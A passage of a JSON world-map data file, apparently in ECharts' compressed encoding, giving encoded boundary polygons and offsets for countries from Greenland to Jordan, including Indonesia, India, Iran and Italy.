ЊλԋɏڣÜҦƫΎVÊͿȋǇɯg˷ϝϥPˣŜҒȣɱȡࢃaڐŵƙΓǲʝЍŝȨċ̵܍˝ȱ݅Ò׬ǡúˣǓŏՓĈʠƕȽǭ`¨Ā̅Eǂ̐͛ɍ١ƼXƜͤîȀǨԽȁ֓ƞăƊɬψࡇ͵ળ¡ΊȔԭNƶгṷ́ˀûʦҪǄڛåÐȠٟȬjȾъ˔ԅȇ࣡ېß̪ઌǪȏK¦Ė७ǭĻĐʮɒތȖМȷĥɎͩÀϋκȪ͹нƙŊ֕ґ˱޾ɹƤޘ͔ѸÀՋ«۟ɗǭňοHþ͐ʉÒᆖ۪ົ֯х¿Ķє͊Ƭն°ࢳυǰðʄॎ˦ႬȅҵƔǞĨڝÍӣĊଢ଼ʋӪք଺ų˖¸ȸʮࠧǕহǛ˂κĈࠚƣ֬ŰŚŒχÝƒ͜ڌٻڈڰ࿳٥Ȳ࠭Ĵѡɺ̬ĶନÍྰ͕Ǭ¬օƞÈɞѣƂيQ̛İോ¾ĬɸऺǶඛýʜȔэҲɳϘϿҕǉ´Ǘ؍ùݽƼɺҶЎȶحƩ¯ĸ˺®ʳČ֪Ĳǀʨ˭Ťǹç͉Ú͊ˌۅȚɠǜ̶͗ࡋGѲĀUǮϲĈኻۜˈźɡƶᖟЀᄓǎҩœϵČࢿƽыĞӷċѷØˊȣఉø૭˨଴ɄಷîiɈޙƗѹǨɺŬཔj۾Ƹุĉʩʹ࠹Ɓ޷àؕœহȜΞŢঁyಝ͌̄ʎےŢᖂȞԮƲᒪŖࢄ۞ԨĊᖏmǧʶᒈԬژ¶׌Ɨŀˢ௾íӾ؆ಾ|ᖖѫᕭզ◴݆̂ƿĬѕ֚҄ᅈΩ଒p୧ϸݲö⪴׉ЮӴૉ͈ᶰÇюÎ♣ĠǤي፾ȸ෬ƍߌȚᇚ˫ӽ̺ࡶń㹪Ê\"]],\"encodeOffsets\":[[[-47377,62241]],[[-37920,67105]],[[-52237,71222]],[[-53996,71624]],[[-52915,72556]],[[-26042,72624]],[[-54820,72746]],[[-56337,74539]],[[-18432,77218]],[[-19028,77868]],[[-73387,79182]],[[-18035,81742]],[[-45941,84054]],[[-30671,85571]]]},\"properties\":{\"name\":\"Greenland\",\"childNum\":14}},{\"geometry\":{\"type\":\"Polygon\",\"coordinates\":[\"@@˶DʔŁRƾ̮ȅÿáˍɉɷǩƳãáǧºǑQ¿īÝÛĩǯsvůс˳ƕїǊ٩¼ܛҲÜΘ^tr ĥȺĖƦŀǪȄ̮ʬBϢ@ɶ@ƴ@ÚDYøTĊø@­¤ĕz·@°sÈ§ÞɟƆη͚ǶAǠCHӂໞAÑྩ\"],\"encodeOffsets\":[[-91374,16270]]},\"properties\":{\"name\":\"Guatemala\",\"childNum\":1}},{\"geometry\":{\"type\":\"Polygon\",\"coordinates\":[\"@@ýƚȐƾÆǗʻ\"],\"encodeOffsets\":[[148216,13578]]},\"properties\":{\"name\":\"Guam\",\"childNum\":1}},{\"geometry\":{\"type\":\"Polygon\",\"coordinates\":[\"@@ĽǳĠŝķƧ͋{ǥƛÒŷǩӇ΂ש̀aĘѱвۇȆāУsËh¯ÎuRǗ§ā¯óœ¡£mǛGßğg©ŅʱÊµ_¡ġKŻơGµM΅Ʀʯ˖ŋ CĄÓ_vB̼œöĕ˞Šݮʬ̄Mx¿ÀıǢłϗƲƄҤŵƀċhÿ·ĽWǉ÷gՓפ]ôĢàäÆoƞB¾}ÈmÚ¶ĚάÖ̮Ƞ~øGg`ĵbµm»X¥²í˘ǤɸИȬĞt~Į´d¶ƻȲۈЋׄ֩~̟ǉխɒϮδÅϊϡˀŹՉ\"],\"encodeOffsets\":[[-58567,5682]]},\"properties\":{\"name\":\"Guyana\",\"childNum\":1}},{\"geometry\":{\"type\":\"Polygon\",\"coordinates\":[\"@@ȯǵǪӰŗŉq\"],\"encodeOffsets\":[[75477,-54412]]},\"properties\":{\"name\":\"Heard I. and McDonald Is.\",\"childNum\":1}},{\"geometry\":{\"type\":\"Polygon\",\"coordinates\":[\"@@ݷȱĝxǷŲĽµ×ƛűɩѳϟgMOǓĸ³îʓɽ]țhĽWsaW¡PÁȓhÿeyÁIå[ùǹ¥_ɹYŵ̾˙ĺÈʖazÏ¤÷Jĉ_ƇĞʡŗF]¨MºO^ԝ͢ȯǈǈRÀ¹ǒâǨƴäɸǪˎɊĀâĆyɎƮ౤ąΞƞ¥ÐфĽєøΐƿʤjиΕǩĪřw`ûƘMƖƣɚDůŬɶŇâƉÄÌ¥ɍ`Ĺĉč\"],\"encodeOffsets\":[[-85642,15234]]},\"properties\":{\"name\":\"Honduras\",\"childNum\":1}},{\"geometry\":{\"type\":\"MultiPolygon\",\"coordinates\":[[\"@@ŘËͳøɜk\"],[\"@@Ҍá˱mǙĐ\"],[\"@@٦˱æŃ׋̪ٹǾԺı\"],[\"@@ʛ`ĎϊÓė\"],[\"@@Æ×ƕĤĐ\"],[\"@@ƧȬhɞƀщ\"],[\"@@̟ĒĶŪȪȻ\"],[\"@@ÇąȌˏ¹īͪƿ˱Ù±ɣƝ\\\\ƣǎ܋@ݧǘ͙»ȥǧɝƲȫU©΍̮ȵǔͫࠊ֭̈́σÅËֵϢёŶ΃oڥոÁì̊`Ы˦ŁВʯǼȥϝп˿ը̤­Ю®¶pŢŶpK¶áŦÿƊlƀ£ŌSĈvYOÐäÝÖ̀ňpĺQÄÍ¼IbкǮǸŸĚUöq®]ƮËļÝτ˽иǥҨƨbĎĂȬr\"]],\"encodeOffsets\":[[[18031,43796]],[[17051,44029]],[[18092,43927]],[[17189,44310]],[[15741,45030]],[[14836,45732]],[[15166,46057]],[[19360,47035]]]},\"properties\":{\"name\":\"Croatia\",\"childNum\":8}},{\"geometry\":{\"type\":\"MultiPolygon\",\"coordinates\":[[\"@@cÏɋêǗƎЈƧ\"],[\"@@ƇǫÖŋN«aÏĻĳĵG[W¼ïÊăĢÙtÏșíâýÊĩۇÝёČ̥½řůӽ΄úƦƆூȑΎŞ|ĎϵͬĜ̴؟ʀȂƊӦdΖſ͖¡²ll}ǛǛČ÷\"]],\"encodeOffsets\":[[[-74551,19229]],[[-73366,19657]]]},\"properties\":{\"name\":\"Haiti\",\"childNum\":2}},{\"geometry\":{\"type\":\"Polygon\",\"coordinates\":[\"@@ĺDˢɯƾqĜƍ݃χ݅ਇ̣ūħėȑqd£`ȑh÷_ȗpǉėًſčāaƧҧзǦσ˾ĽÞƫÌ­^ț̜ǅL̢ŦUͦȞŖɉŜժäʤԬȣ߲dÊǴ۬Ȉ˚Û͐ŰƀȚ߲tˆǵ̪Ê\"],\"encodeOffsets\":[[22663,49568]]},\"properties\":{\"name\":\"Hungary\",\"childNum\":1}},{\"geometry\":{\"type\":\"MultiPolygon\",\"coordinates\":[[\"@@ĹVhŘѴʌ ƧЁɑ\"],[\"@@ƭʚĠīť\"],[\"@@ùŐľƋ\"],[\"@@ٮө¢ãœƙɑóʙĂҙΨџÊŃǀ˲ŶլÈÐÕ\"],[\"@@՟՗֯ǕţÞĤǈŃĤĶ̒˞ɰȸñƌȨВȺ^ġǲV£ŭŝoĜʣ\"],[\"@@Ň°ä¤č\"],[\"@@õĺŜŤwƧÍ\"],[\"@@áJ¾ʴĢ÷ýȅ\"],[\"@@ʗǊƈĴeï\"],[\"@@ŃǧÔÅ̅u͏ŀȂ_ʶ˺Ȝˊōßɷ\"],[\"@@ŝǝǿêʾȶ Ł\"],[\"@@̹ʙ˕ȸǪí͔úŲé\"],[\"@@˧âȞŖĊǷ\"],[\"@@ÅƺƤĝȁ\"],[\"@@Ќæŭفõ¦ȜŪ\"],[\"@@ʞÑăíǟÆFú\"],[\"@@्ʋȣìïďʗeСŐ՟±ďƈÈɺآƮۮ˱Ѭĺ̚ơѸ˘ÎèƉƄäøȇȉʃ\"],[\"@@ñȶɒƀ˃ǁ\"],[\"@@̴ĐőǴİǠ̷͑Éòć̓mċƴǃƓेɑɭþ Њˢƒ͸·ȪʇƎaɠŖΛɀ¹Ǌ̦xŀǏ\"],[\"@@ɎɃҹω÷ɶωǎũǲЄiǺĸʚõ\"],[\"@@ĿïĕȦǢatœ\"],[\"@@ˡʃγÄȯĉƪ˒ȨͬŔǈă\"],[\"@@£ĢĖc±ý\"],[\"@@ȩŋիfδېǶńЌ¤Ȁʱϟӟ\"],[\"@@ǱDrˀъӔþëûÏg̟ʣ̻\"],[\"@@șîƠZºć\"],[\"@@ş¤ĈÆĩ\"],[\"@@őFOĈŢč\"],[\"@@׽ĳͳŶŢƢǚhނNĊñȕŧ\"],[\"@@Ɓfjüʲßƙ\"],[\"@@ŋtŜúOĭ\"],[\"@@ǵ΁ț`b̦ôXãɦΠɁ\"],[\"@@ʘǩ֐Ï̈щ฼Ɓ΄ѰŚWǬɁ̠ҠȵϞĠʛŪé@ȻȀėРÇӖú˶ƅmԥǒ̫ૣОӗĹঙĔݹƀ૙ώғʏŉ҅ÖՏɄۡĔÄˆ˓ŀ߉þĬƞĨįƞˀŎZè˸ǦǞـƷȆǎ˞ē\"],[\"@@ƓSׄ¨ѯ\"],[\"@@ŏPĔÞ|í\"],[\"@@Ł½§ʲƪȳ\"],[\"@@ӵɯʉɬŮ®ƪřŀŖIȖʈƨɻ\"],[\"@@åïʘ֜eɏǋ˛\"],[\"@@ɍƀɖGĥ\"],[\"@@ăĆìA\"],[\"@@ȟƴĘƺņñBɻ\"],[\"@@åıɿÊĨɀwʬ˪Ű¸˅ūǡŋ\"],[\"@@`ɫşØé͝ǸǍǿÕſɟƕP·ƦưɺòӼȆȚĘƏ\"],[\"@@¨­ʧǂɀœ\"],[\"@@ƕĩęǔȲ~ī\"],[\"@@Ɲ«ºļĤÏ\"],[\"@@ʡą«ÒͺƸ«ƃ\"],[\"@@Ɵ½ĈĈØ\"],[\"@@ȳŝJҦǦǦԭ\"],[\"@@̮ʭFȯҙǅЅȀƃƸˆٮf\"],[\"@@ťÔƘAqÑ\"],[\"@@ՀĽǆšʒσ¯ʋ߯Ҁ˧CĿԕȀ̅ǵ͑ʔȗ˵qɲ˒̚ږƸĕʺŮɪã\"],[\"@@ũɕ˼KǜɌǹ{Ƴ\"],[\"@@ŷȕǓŠȱĻ§ʐĒ̖ƞ͆ƕÚŏéƗ\"],[\"@@ǁáwʜǺǹ\"],[\"@@ȣðȚɬˉ\"],[\"@@ǉ̀ºĐŐЏ\"],[\"@@ʶܑįûĆ՘®\"],[\"@@ÆɽƛÛѕƲԬƨ\"],[\"@@ȀMłƑݫŅóŬôǘҪ\"],[\"@@சǧ֑āهʪ\"],[\"@@īĀŰ©\"],[\"@@ːڛϠğǧˑ²Ʃ֙ȺǳզշŜ˜Ͼł¢ĬǡhǔǄzŖƏ\"],[\"@@ĩpƮÌǝ\"],[\"@@ӹÉƕŜɄɎь˟\"],[\"@@tǽǔŸĦčġȥVďƭmʾɕʃážĆɀʰV\"],[\"@@ȹąZʖɤ­š\"],[\"@@ēDŔƚ¯ç\"],[\"@@˯ƘȍΌØȒɎbˬ֣ēų\"],[\"@@ǿ¼ğʞ̠ͯ\"],[\"@@є×М̱ǯĵȽƙ̘č¹əȘ\"],[\"@@ťh¬ŢúƉ\"],[\"@@ƉŴÎVģ\"],[\"@@băȏoǮĴ\"],[\"@@@ǋDᲗħͥĨƓBᇳࠉޢĪɮƳƫҥóŗǨ̝ɋǖմ˹˰ΰ¼˥°ȵǚɜàΧўţͨàĘƥŞŎɃuȴٿѨ։ń՛ʎڅäѡ̺xľưbԵOĳŲơkʝ˴ƎΦş¡ɷœįХŷƍ˫JƇ̔ĬŸıɎٽьɔĞдğϺ̐ђƽ®ƤŶºħĈŊǈ߫Ɲս~ʅɄýβ՗ƖʡǐɒÈʺҠŸӸ̈ϴ½ԬʷфeŚđŻǀ̣Ź̝öӳɞѯpɀŨØͫŢrʧ̪ƅȢp̺̌Ҁ؈ִƘČâ¡ƺֶ̞သܫ۪ćŀƉȎE\"],[\"@@ĮōȑǉėǐǼň\"],[\"@@ĬűÝšɴǗĳ×řİƉLƎƗŤrƒŌÑĤô\"],[\"@@ŉqNȮƐKǯ\"],[\"@@ɳSôŌǀķ\"],[\"@@϶ũÀş˫Ï͏ɲɶɏůċ½ŮśÏˁƂłŘϚÌ\"],[\"@@űAİʲĕȎȆɍíɯ\"],[\"@@ȐęҷĀĄǨȤǍ\"],[\"@@ũP¢ŴĈƃ\"],[\"@@ҋĢ`Țиȕtĥ\"],[\"@@ĝpÄ¾í\"],[\"@@ϷƶpĘɲùƖǓ\"],[\"@@Ĭ]×ƧőèþĞ\"],[\"@@ÞƕñǽŗȀƿĢƔȊ\"],[\"@@ŭðo˒ƾƍ_ȳ\"],[\"@@ϚЭģ·ŗãȦǕĨ˛ДɶĪł×\"],[\"@@PŇЍɸϾů\"],[\"@@ϱѳ֣ƑЧlɥƖဝ©ιð͗ɓƭϵ¦̟ƬˁɶƝŴˣК~ΪіͦĕʼƨԠD¹Ć˼ôǪß°Ň³ȏЋĔշջ͡řǩǝʝb޾ࡻĜʗūΛπϵƄhr˝ŷªԗǙÝʕϗÖďƮŌШ؍Ӓƌ̔CΔơĘȍkͣʁƨُaއšѹŶϏГ\\\\ȟĭƇêǓʠȠڔ|ШſѬЇqŃŞë֪ʸȨȖҬYѬǘфǠȎŐƱĹٰŦň³ǖĖǦ̚Ѷ˨įɠͰǶÚ˔ëǀƧ܄¥ͶơȔĆܪûԒ͌ΎψƐ\\\\ļƷ́э\"],[\"@@Vʏǿ³ùʐʤ´\"],[\"@@Ű_ðǮǌĬ¾ȲϺƠ^ϻ͹ȕţ̎Ʒʐ˫ޕɌăƣúҟϔէ͇ǀ̕϶bѼƝ˖ÐȦƯʖǠנ;̘ṷ̋ľŋ@̵̝ˉäƓ\"],[\"@@ȏŢƸaĿ\"],[\"@@ƃcÝɚ͒ʦòĻÅȿƛƟ\"],[\"@@սʞùƜƮÂѬ̽Ž\"],[\"@@čiČĨBý\"],[\"@@ËǘŨïÛħ\"],[\"@@CËéĮî¡\"],[\"@@ġŶŐqmŃ\"],[\"@@ūtɬǂʟ\"],[\"@@ōƽ¥óƒȢb\"],[\"@@ǹ^ŦĘȭƢȸȠŨșÝʝ\"],[\"@@ğāʾ͗؃ÇʒǑLțɒŉœň·½άяɷʓ৐࢛ϙƗ˵¼ʅȌ¬ǭȁƅȇг·ҹĊϓկϝƣƮ\\\\ʃБϧŰ@xśřǻɂƅǯǱ\\\\̋ƏúǇʧϿਖ਼ӗƗژãėď@ǮěŁŻèͅƩāɔɡ§ʹ˂¿ɇǳœƃá˅äΩșжŅƘٝƳčÚÎòǑĥŇŊˉÙƇ߸ŗŜpӴǏɜѹǢĨƚɁȺŖΠʿ˚yҴȆƢĴķ[ÆɌʬΪɂĘùōĬɿܐمԄǂתɨŎĜʞʒĶϼPÂŏԮǕɾǖԠdˌѺɪͤɮĉĤɖňŌǪRȌ঄ƴžռnӰЊƕ\"],[\"@@ĥĠǀûðǢƐɏĕɍ\"],[\"@@ࢰoלړ¸ˑ஦އږ࠳̪ȭ¹ʜǾ^βӃҘɁ̶ԋբɛqƍϧǗڐʢ˪ȍĪȭ̝ȩoƛĖēÏġʂʻ՞ŷžٿˢɯǍуːȌΨSծ؍Ǜяòǿĉˣ²܅śڷͱɦɣǑωȎ̻éW٧ۚઙެ·Ҭңδ׃ޚ˄ҟज՛ܺѕʴӁౚݧдġЦǗňΟԌѱȮܭ܄̹ԺlʀͶш˃̠Å\"]],\"encodeOffsets\":[[[125900,-11171]],[[124809,-10844]],[[126379,-10549]],[[122893,-9599]],[[128070,-9740]],[[118385,-8980]],[[125929,-8750]],[[122332,-8950]],[[126278,-8555]],[[119441,-8820]],[[127270,-8529]],[[126900,-8471]],[[142229,-8589]],[[120378,-8568]],[[127566,-8336]],[[130892,-8293]],[[125730,-8818]],[[134003,-8518]],[[121081,-8517]],[[118219,-8350]],[[132955,-8145]],[[129845,-7851]],[[130478,-7806]],[[141861,-8472]],[[134478,-8191]],[[135150,-7374]],[[131759,-7355]],[[123674,-7289]],[[116577,-7275]],[[118147,-7138]],[[107779,-6799]],[[137766,-6596]],[[109951,-6151]],[[123421,-6449]],[[115425,-5950]],[[135995,-5991]],[[137981,-5843]],[[136117,-6043]],[[104825,-5610]],[[126594,-5398]],[[124972,-5568]],[[125589,-5395]],[[126137,-4660]],[[136777,-4347]],[[126201,-4211]],[[131649,-3671]],[[131355,-3762]],[[119219,-3547]],[[119095,-3960]],[[129906,-3161]],[[109452,-3077]],[[132869,-2934]],[[102836,-3259]],[[110805,-3069]],[[102609,-2806]],[[102240,-2399]],[[129081,-2510]],[[129049,-1832]],[[133482,-1731]],[[127969,-1746]],[[138726,-1630]],[[111568,-1658]],[[108591,-1709]],[[126564,-1745]],[[131229,-1700]],[[126170,-1199]],[[112344,-1209]],[[138205,-1142]],[[101544,-1820]],[[134146,-1347]],[[138633,-667]],[[130356,-799]],[[133762,-541]],[[124790,-416]],[[144357,-2672]],[[106982,-342]],[[130629,-326]],[[130304,-507]],[[106227,-356]],[[133953,-4]],[[100823,-543]],[[107294,-180]],[[105764,555]],[[105501,765]],[[105907,1074]],[[105643,892]],[[106522,1209]],[[107096,1246]],[[104886,1014]],[[99822,1501]],[[104952,1495]],[[127887,1020]],[[104150,2129]],[[130799,869]],[[99671,2126]],[[131537,2102]],[[98779,2417]],[[111501,2976]],[[108299,2932]],[[108837,3233]],[[120483,3360]],[[128674,3519]],[[120714,4287]],[[110916,3779]],[[120397,4271]],[[129861,4131]],[[98809,5355]]]},\"properties\":{\"name\":\"Indonesia\",\"childNum\":107}},{\"geometry\":{\"type\":\"Polygon\",\"coordinates\":[\"@@̽ĥ̤ˬZȅ\"],\"encodeOffsets\":[[-4517,55486]]},\"properties\":{\"name\":\"Isle of Man\",\"childNum\":1}},{\"geometry\":{\"type\":\"MultiPolygon\",\"coordinates\":[[\"@@ʬ@ĤмӼþʜόώeլԟ͚ƺ̃͠đUz­ƓíȘșKąuū¾ǅWǫ̑âʀ˵ɶĉɔÛʄǣaīֶɹĦ­rÓ`·O¹yiŕĿœāŭƛíƃ½ůBėoĻÁÏqėĽhƀěĈ³Ā¯¼Mbn|Î_Ө˃ָϿP¢r^¤YÚƨĝƐíƬ`¢[ÛpßҲůä^ÀjĖQǐ»èeɚĪŜÁɂãň¥£\\\\Aĥ¥юɳĐsɴČâWªš´Ǵ׎ǵ˄ĶɬǏłÂμ\\\\Ŭ¯Zz´ƀ¦ŜGèĸįƄS¢ƎԬFĀxAÀ`ŒjŶŶèȐï±СbûÊÉ¸SeķákĴǵʒũƺɈÏp¹ĐI¬YƮnư~êþŠͦıҠdŞÞ|@À¹źIƞ¨ĐP°K¨hֶӠ£ʨҎϬɢࢎƈՎ̰Ϧ×٢˿áƷfÙǞɵC¡ůdſƎԙࠩԵšƕRʃċjiF{şɫ˗ʽĩȱŴįǭϯĭƍëŷǿϙ͡ŔȗeŁÜ޳aũ£Ŀˋê̝ùųęǥ¯]±léĂçv·ĵ±[ÐÍ՘w¦đǎy˂ñφǝIÅ\\\\¥K@óRÿƷǻEȟǕ½įǪÝŋǕӼǄͲ̈́ŨĴ{Ǿǘ®ĴĠɸBĢp\\\\ŒêĂΙȎ஽Cб¬ɅÖ«XYpȊC͎ŵɬĉåmŃɕɩ̼ÉBfƉ{IɏƑȐůeåW®ďęĥƵƛȷ}̘ɱɢðƁö[É̙į@ëȏ¹ãBùKĕǛ]£M²ÝÈÃâsĦMƊěŦiæ§VM[ĭ[Éō˟ÊĽÀµvȥƢoy˿jǯŊ̛m˳ßBĐʅǋúħƇGΞĉĮµϱśƃŦŕǑÒŜϐɇȢǾɅ˯ͧԻƵȷƭĥɓŐͿȋ͗̽ʳŋ őףȏßHPǈɋŋÉƋɖ֝с֕۩ำ৑č҉йȗЏPʳӡ˧Ř̓ƹȫ՗łԃÉɟǎؑųȔÿěɾȳħ̵֟כƓ֧Ět¦šUܽѯÇׅ̿äț͢şγÜҷƏȓǵŏэҕʱϝȦљӲȓҤçЎŐ͙êEĥ͖ųƐЅੴٹৠӁྰεӤů˔Ō@Ƈƨ¼òŷ¤ǡ̄ԍᓶĆіřƫĔRȂƦkǗîĵϾȐۼãϐǅɈĤČķSоʐӍ­ƂɴƭHƸɌÖՁļåċȥɡƢāǓȩ̿ࠫΕʱDӻ̔ঁ৒æŬȎŵݴʌˀѢųű֥Ʊέöԁ˼ȉ͎̠ɾҕɉÍɔİÒĊnĜbĈAŚCHʨXxh^lNhIzDvìgÈ\\\\ÌcĬAǬPĬEȸěʘĺǈÌɎÀfQ¯p«ä´O¨Pbææh°C¾B~ÙŢL vwÎÏŔÕƞȍ̢EȲáÁiµGƷtƑǠ¤πǜէɌĈ̶ˠʦżȄĂż¤¨ƆúîCŠïÀƗĚ¹ÜJʼİ̞˞þfî¸ŊƲƚƐ̎¦°ҾɸВݾάƆÞÌ ¼QºÐbêĢîˤ̼@ŊÈļÚO]ýÖbÚºǢY¸ÑǄ`ª|®æÒĔ¸˨ŠÊ`ĬâŜWN\"]],\"encodeOffsets\":[[[77130,33061]]]},\"properties\":{\"name\":\"India\",\"childNum\":1}},{\"geometry\":{\"type\":\"Polygon\",\"coordinates\":[\"@@¿µáƠĆŏAƨƁ\"],\"encodeOffsets\":[[74232,-7554]]},\"properties\":{\"name\":\"Br. Indian Ocean Ter.\",\"childNum\":1}},{\"geometry\":{\"type\":\"MultiPolygon\",\"coordinates\":[[\"@@ˋÄɨt¤÷\"],[\"@@Ňŭˎ࡛λӧŜĉӅñÙøࣽΣ̏Â¼űϵŽޣġǲǨԃãѬɰدÙδ˖ЗZÒӮőźɰŦ܊ŎǧÜƹĵحÅϜɆƔɲ̴Ģӫ~ӝƦsŖͬ²Ƴļ˖à@Ø˯_¸Țȣ¼ĒౖaßĘЬʚՋ͘ǪĒɎԜĢRʇ̌ͨ̈Ņɍũ˧˗̡Íƀē̩ƱјɩʂUˊɰ̜̇δ|\"]],\"encodeOffsets\":[[[-10186,55208]],[[-6367,55387]]]},\"properties\":{\"name\":\"Ireland\",\"childNum\":2}},{\"geometry\":{\"type\":\"MultiPolygon\",\"coordinates\":[[\"@@ȝȃեĝϜȂIŖѮHû}\"],[\"@@͂|ొٸ˜ʇǽƃǂȅʝƑԄϋɶrüқǰʑ߬ǋ͸ͣӰɫ࣒ķೠʸŮ@ȣÝʔ±ѴڈńǚʶКɰݠ|ƚƚنƈȱނʵҰdТơźɏԞʑɺ˙ٺLþϝ¹ǵČğTȻhÇE³ƋõiΓŇǝgĥã¿S[uTuvańŽȷYƁǱ@͑ôĻ˾é̙̯bťŒͧĴ̍CçƱCğHǻ|ƑYɎȢ{˄Ăą¸ǳEƅwçȋțȑȡЧщǈǏİķب࠷ܺ́j͵}҇ΐY|Q¼±HwÁRǕQ]±wcƟܙƥÓőĩXʃţ»{ƛuŷamÍ©McT·ĝqʡyë¯MĵÿؽƲŹżġĿߍƜ΅ÃȽŘ௳Ȧʣࡒʵ˞ԡ`ଝՙїǈҕ|࡛ԈǹʘϏǪχʻɤǻԂǏŨRǊǙìsɰЗтćɸѡƛѷʰǒŜȅé͕̻ƃËēȼ˅ưIѲ˥Z@ͰØǚÜǌīŢĻŸáÀƵʰfƏOҩ̰ǉĄálƻNgfYª@¸¼ôJ²ŁƼԻҲŪȴéɊĤŘOȌȲȘĶªü lÎŀşǞÈŲŦæVzė¢͡BΏǌķ˺©VD¹¾ʍ֞|ŰȃŨbɴ͇ǔȨΪŵªuϚȽҔ̮ǖ̆Ȗı֎էՔŇ\"]],\"encodeOffsets\":[[[57537,27568]],[[47222,39811]]]},\"properties\":{\"name\":\"Iran\",\"childNum\":2}},{\"geometry\":{\"type\":\"Polygon\",\"coordinates\":[\"@@ŗPģêɉũȳԼұłƻI±»ó@·Z©heɞyǊăҪ̯ƎPeƶʯâ¿ļŷĬšÛǋ×Ǚ@ͯ˦YJѱˆƯǺ˕ûqċfǳìƅ{Gy˭ĪзąȯϳŗǅÙóƋƍƧ൝Ŋ߉վ෗ਚഃۀğ˻²˗¢ҷèŮĴĜǥɣ࣊ᇴࢴǪ˸ƆܸµزĶŌ̺êӐјĆhưĸĘĦTĀÌSžӪşƊGƪúĐWgbMųä×Ü¢ǢĲÂE¾Ooʎ֝º½CªUĸ˹ΐǋ͢AĘ¡U{åťÇűŠǝĿkÍûķ©ȯȗȋ\"],\"encodeOffsets\":[[46733,35404]]},\"properties\":{\"name\":\"Iraq\",\"childNum\":1}},{\"geometry\":{\"type\":\"Polygon\",\"coordinates\":[\"@@ߔźѫɋΜėŇɋκpåǱʴÈҤĻƿƏǦˍϏʙ˹H÷ɃϝƣݽťڵʻধŷŋƫקŇಙŲʝŌäĲȥÉуǨఽį¥Ɍǈû˔¢،˸ӷÅĒǜ̢Ĥџỵ̈ɚଏ³ǧŀਦƶݬDĦŞؕR֒ɂࢷŐ࠹ơӛİȒø͢ÛȡȨАćˤÐҟČʶɅŘ̀NeƂθǗ̠ƃƤGƊуŤϴ®ՍÔƠúѦBࡨͻʅʅeѼϧ˚̶̌ÅȺѼ׾˧ĚʶҌĞעϙŽΤ͠]̚ƭͮȨ˄Ý̔Ð±ɂʔÜɜQϊʉ\"],\"encodeOffsets\":[[-15916,67818]]},\"properties\":{\"name\":\"Iceland\",\"childNum\":1}},{\"geometry\":{\"type\":\"Polygon\",\"coordinates\":[\"@@ǷÿGkcȋÉNå¤açjģlŅ×¯Ĺ¯ƫȹWqsPclMÐlØkÜÉɅŭÏȟӐĤБྣÍßփบĒìDÐƨƎ£¸NPǎʮβীʬOϨ̚ЛŁǷ\"],\"encodeOffsets\":[[36647,33521]]},\"properties\":{\"name\":\"Israel\",\"childNum\":1}},{\"geometry\":{\"type\":\"MultiPolygon\",\"coordinates\":[[\"@@Бٗǒ͹Ƶ̯ԣĢ̝ʲȥEء͆ѽĬǣȎʤ̨ƚů͜Ƃкǯ૤Ơ͊ŚàÏ\"],[\"@@µċ¯ŮĦ¡\"],[\"@@ãĪľç\"],[\"@@Ƣ͏ƋșåएыÔ÷ɳˉȗɼňՒŝàẦɿ̠ɘ̈Áր΂͚ȫbœ\"],[\"@@rŧʍzɜĮ\"],[\"@@ǰFgeqË½¥M}PmlYúLÂǁƘģģýûƸΟ@޵˙¡ǡʢɯɳȷŮлঘշϒݍѾϏՆʻ࠸ɛ͑ႮܛьηįͱɟĬǳ˾Ͽ¼ǹƌɃͿׯӾ̯º͍ҵǕÑ͡Чϻ˩EßĄȜӢˌŪ\\\\ƴѣࢤدȾEȘƳǘΧÍĶŊΓêʻΤթPϩȎ࠱یзĒvŪϫʹǋ˝࠘டЌٕҝљğŨͮˋuΙǔþа̛ȬόƠÊŢ̗̠ȘƺkÖoǖ֒ĔöȬŴîÈÀÔôǗ̢ƙP_£ÃƨƕÐ`ư̾ĎɶĂ]zBĐƧ¨SºAŰ¨Ćl°KĒĽS¢Teŀy¶xMnÂv®¦^¸LȠÏi¸W´PÎ ŊvSĎAĠOÐ«ÎeĊKÈPj¾ÐÞĢǂNĂ^ȼWͦĆxOJ[p¥Īċ¾Ù¸µú}ׄċƶ]ŜEǮgµ[×ƍćlė\"]],\"encodeOffsets\":[[[15951,39138]],[[8683,40006]],[[8485,42025]],[[9864,41864]],[[10645,43887]],[[13744,47322]]]},\"properties\":{\"name\":\"Italy\",\"childNum\":6}},{\"geometry\":{\"type\":\"Polygon\",\"coordinates\":[\"@@ފʱŞȧ˃¡˟ĞùĿƧíƑƁĲͿɵʞʛĪļƈ˾ØԦÃ\"],\"encodeOffsets\":[[-79115,18901]]},\"properties\":{\"name\":\"Jamaica\",\"childNum\":1}},{\"geometry\":{\"type\":\"Polygon\",\"coordinates\":[\"@@ǻ¯`øǜ\"],\"encodeOffsets\":[[-2067,50413]]},\"properties\":{\"name\":\"Jersey\",\"childNum\":1}},{\"geometry\":{\"type\":\"Polygon\",\"coordinates\":[\"@@ůįYӱŭɛÇԱŽɹÍɍÃ࡬࠯į³ǋāgcacãƗ¿őka׵Ň©ĥƑīƟǋŝǵŻऱŸnǞВྤĸْiƂdȌHlǸĀӬ̇ϒÏ࿦ࢲɤࣉǦěŭĳ\"],\"encodeOffsets\":[[40085,32896]]},\"properties\":{\"name\":\"Jordan\",\"childNum\":1}},{\"geometry\":{\"type\":\"MultiPolygon\",\"coordinates\":[[\"@@ǩúĆƐ«ç\"],[\"@@Ɓƙ©öǾŶQÑ\"],[\"@@ƥS^ŜƈŇ\"],[\"@@͡ǭÁʑų·ɊԌǄuƂǸHȕ\"],[\"@@ĉNPƜúƩ\"],[\"@@ïåǝĺѴɤȥʷ\"],[\"@@ƩDµļĠÞŪÛiŁ\"],[\"@@õ 